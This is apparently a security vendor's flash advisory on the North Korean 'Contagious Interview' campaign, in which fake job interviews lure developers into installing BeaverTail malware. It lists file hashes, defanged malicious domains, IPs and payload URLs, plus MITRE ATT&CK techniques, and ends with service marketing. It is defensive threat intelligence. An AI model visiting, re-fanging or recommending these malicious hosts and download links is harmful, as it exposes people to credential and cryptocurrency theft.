overview

A new wave of attacks originating from North Korea have been targeting job seekers as part of what is likely a financially motivated campaign, dubbed “Contagious Interview” by Group-IB, a Singaporean security company, who discovered the attacks in mid-August.  

The attack begins with normal correspondence, culminating in a fake interview, designed to trick the job-seeker into downloading BeaverTail, a strain of malware that delivers a Python based back-door with remote control, keylogging, and browser stealing capability. After a job-seeker makes initial contact, threat actors  will attempt to move the conversation to Telegram, the direct the interviewee to download a video-conference application and potentially a Node.js project, to perform a technical task as part of the interview, thereby unknowingly installing malware on their own system.  

The campaign has been attributed to Lazarous Group (known by other monikers such as Hidden Cobra, Diamond Sleet, APT38, Zinc, Guardians of Peace, Group 77, Who Is Hacking Team, Stardust Chollima, and Nickel Academy). In addition to the information stealing aspect of these attacks, BeaverTail has also been specifically modified to target crypto-currency wallets and related browser extensions to directly steal from potential victims.  

 

 

how avertium is protecting our customers

 

IOCs ADDED TO OUR THREAT FEEDS

NOTE!: Avertium is actively searching across all monitored environments for the IoC’s listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager. 

BeaverTail 

  • ff620bd560485c13a58a0de941bd3e52943036e6a05306e928f7c626998822fb 
  • fc9bb03998a89524ce5a0f859feb45806983aa4feb5f4d436107198ca869ff6f 
  • e2a940c7d19409e960427749519dc02293abe58a1bef78404a8390f818e40d08 
  • de42155e14a3c9c4d919316d6ba830229533de5063fcd110f53e2395ef3aa77a 
  • db6e75987cabdbfc21d0fdcb1cdae9887c492cab2b2ff1e529601a34a2abfd99 
  • da6d9c837c7c2531f0dbb7ce92bfceba4a9979953b6d49ed0862551d4b465adc 
  • d8f065d264b1112d6ee3cf34979289e89d9dcb30d2a3bd78cc797a81d3d56f56 
  • ceb59dbaf58a8de02f9d5e9b497321db0a19b7db4affd5b8d1a7e40d62775f96 
  • c8c11f9b308ea5983eebd8a414684021cc4cc1f67e7398ff967a18ae202fb457 
  • c5a73896dc628c23a0b6210f50019445e2b8bfc9770f4c81e1fed097f02dfade 
  • c547b80e1026d562ac851be007792ae98ddc1f3f8776741a72035aca3f18d277 
  • blocktestingto[.]com 
  • b833f40b2f3439f317cf95980b29bddd2245d2acc2d5c11e9690dd2fa4289585 
  • b5f151f0a4288e148fd10e19c78399f5b7bdff2ad66940fadd20d6eae4b7518b 
  • ab198c5a79cd9dedb271bd8a56ab568fbd91984f269f075d8b65173e749a8fde 
  • a2f8de3c5f5f6ecbf29c15afd43a7c13a5bf60023ecb371d39bcca6ceef1d2b7 
  • 9ae24a1912e4b0bab76ae97484b62ea22bdc27b7ea3e6472f18bf04ca66c87de 
  • 9867f99a66e64f6bce0cfca18b124194a683b8e4cb0ced44f7cb09386e1b528d 
  • 92aeea4c32013b935cd8550a082aff1014d0cd2c2b7d861b43a344de83b68129 
  • 845d7978682fa19161281a35b62f4c447c477082a765d6fedb219877d0c90f31 
  • 7f8bb754f84a06b3e3617dd1138f07a918d11717cc63acaef8eb5c6d10101377 
  • 7b718a46ae4de09ed4f2513df6e989afe1fbb1a0f59511a4689fac5e1745547d 
  • 785f65f1853a08b0e86db5638fbd76e8cad5fe1359655716166a76035261c0be 
  • 75f9f99295f86de85a8a2e4d73ed569bdb14a56a33d8240c72084f11752b207e 
  • 72ebfe69c69d2dd173bb92013ab44d895a3367f91f09e3f8d18acab44e37b26d 
  • 709820850127201a17caab273e01bb36ce185b4c4f68cd1099110bb193c84c42 
  • 700a582408cbda7ee79723b3969b8d10d67871ea31bb17c8ca3c0d94b481aa8c 
  • 6b3fce8f2dad7e803418edd8dfc807b0252705c11ec77114498b01766102e849 
  • 67[.]203[.]7[.]163 
  • 6465f7ddc9cf8ab6714cbbd49e1fd472e19818a0babbaf3764e96552e179c9af 
  • 61dff5cbad45b4fe0852ac95b96b62918742b9c90dd47c672cbe0d1dafccb6c5 
  • 617c62da1c228ec6d264f89e375e9a594a72a714a9701ed3268aa4742925112b 
  • 592769457001374fac7a44379282ddf28c2219020c88150e32853f7517896c34 
  • 4f50051ae3cb57f10506c6d69d7c9739c90ef21bfb82b14da6f4b407b6febac0 
  • 4c605c6ef280b4ed5657fe97ba5b6106b10c4de02a40ae8c8907683129156efd 
  • 4c465e6c8f43f7d13a1b887ff26d9a30f77cf65dd3b6f2e9f7fe36c8b6e83003 
  • 444f56157dfcf9fc2347911a00fe9f3e3cb7971dccf67e1359d2f99a35aed88e 
  • 41a912d72ba9d5db95094be333f79b60cae943a2bd113e20cc171f86ebcb86cf 
  • 40645f9052e03fed3a33a7e0f58bc2c263eeae02cbc855b9308511f5dc134797 
  • 39e7f94684129efce4d070d89e27508709f95fa55d9721f7b5d52f8b66b95ceb 
  • 35434e903bc3be183fa07b9e99d49c0b0b3d8cf6cbd383518e9a9d753d25b672 
  • 305de20b24e2662d47f06f16a5998ef933a5f8e92f9ecadf82129b484769bbac 
  • 2d8a5b637a95de3b709780898b7c3957f93d72806e87302f50c40fe850471a44 
  • 2d300410a3edb77b5f1f0ff2aa2d378425d984f15028c35dfad20fc750a6671a 
  • 276863ee7b250419411b39c8539c31857752e54b53b072dffd0d3669f2914216 
  • 2618a067e976f35f65aee95fecc9a8f52abea2fffd01e001f9865850435694cf 
  • 1f9169492d18bffacebe951a22495d5dec81f35b0929da7783b5f094efef7b48 
  • 1c905fa3a108f4c9bc0578882ce7af9682760b80af5232f130aa4f6463156b25 
  • 1b21556fc8ecb9f8169ba0482de857b1f8a5cb120b2f1ac7729febe76f1eea83 
  • 147[.]124[.]214[.]237 
  • 147[.]124[.]214[.]131 
  • 147[.]124[.]214[.]129 
  • 12c0f44a931b9d0d74a2892565363bedfa13bec8e48ff5cd2352dec968f407ee 
  • 121ca625f582add0527f888bb84b31920183e78c7476228091ff2199ec5d796b 
  • 1123fea9d3a52989ec34041f791045c216d19db69d71e62aa6b24a22d3278ef9 
  • 104926c2c937b4597ea3493bccb7683ae812ef3c62c93a8fb008cfd64e05df59 
  • 0ce264819c7af1c485878ce795fd4727952157af7ffdea5f78bfd5b9d7806db1 
  • 09a508e99b905330a3ebb7682c0dd5712e8eaa01a154b45a861ca12b6af29f86 
  • 03185038cad7126663550d2290a14a166494fdd7ab0978b98667d64bda6e27cc 

Contagious Interview 

  • https://cloudov-interview-series-projects[.]vercel[.]app/Osobn%c3%ad[.]html 
  • interview[.]serveftp[.]com 
  • interviewportal[.]ddns[.]net 
  • recruitment-interview[.]org 
  • https://interview[.]az/at-corrupti/documents[.]zip 
  • http://interviewsetup[.]com/rag[.]php 
  • cloudov-interview-series-projects[.]vercel[.]app 

TTPs TO MONITOR

  1. Initial Access (TA0001)

Social engineering techniques are often aimed at gaining an initial foothold into the target's environment. Some of the techniques within this tactic include: 

  • Phishing (T1566): Various forms of phishing (e.g., spear-phishing emails, links, attachments) are the primary social engineering vectors to gain access. 
    • Spearphishing Attachment (T1566.001): Sending a malicious attachment. 
    • Spearphishing Link (T1566.002): Sending a link to a malicious site or resource. 
    • Spearphishing via Service (T1566.003): Phishing through services such as social media or messaging platforms. 
  • Drive-by Compromise (T1189): This involves tricking the target into visiting a malicious website that delivers malware or exploits vulnerabilities. 
  • Trusted Relationship (T1199): Exploiting an existing trust relationship between the target and a third-party service (e.g., through impersonation). 
  1. Execution (TA0002)

After gaining access, social engineering can play a role in executing malicious payloads. Some techniques include: 

  • User Execution (T1204): This technique is used when the adversary tricks a user into executing malicious content. 
    • Malicious Link (T1204.001): The user clicks on a malicious link that leads to execution. 
    • Malicious File (T1204.002): The user opens a file (e.g., Word document with macros) leading to malicious code execution. 
    • User Execution: Malicious Script (T1204.003): The user is tricked into running a malicious script. 

 

 

ADDITIONAL SERVICE OFFERINGS

  • Fusion MXDR  is the first MDR offering that fuse together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts.
  • Security Information and Event Management (SIEM) - Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization to accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior. 
  • Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:  
    • Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment). 
    • Threat Mapping – Leverage Avertium’s Cyber Threat Intelligence, getting a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK). 
    • Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (VCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan).




 

SUPPORTING DOCUMENTATION

North Korean Hackers Targets Job Seekers with Fake FreeConference App 

APT Lazarus: Eager Crypto Beavers, Video calls and Games 

 
Chat With One of Our Experts



Lazarus group Flash Notice North Korea Lazarus Blog